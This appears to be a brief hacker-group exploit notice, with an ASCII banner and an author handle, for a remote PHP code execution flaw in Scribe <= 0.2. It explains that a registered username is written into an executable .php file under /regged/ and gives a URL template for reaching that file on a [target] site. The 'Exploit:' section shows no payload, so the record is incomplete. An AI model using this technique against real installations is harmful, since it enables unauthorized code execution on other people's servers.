--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ --------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- Scribe <= 0.2 Remote PHP Code Execution Download: http://sourceforge.net/projects/scribe/ --------------------------------------------------------------- #By KiNgOfThEwOrLd --------------------------------------------------------------- PoC: When we register a news user, scribe make a file called [username].php located in /regged/. The file contains: Username: [username] --------------------------------------------------------------- Exploit:
Now, go on: http://[target]/[scribe_path]/regged/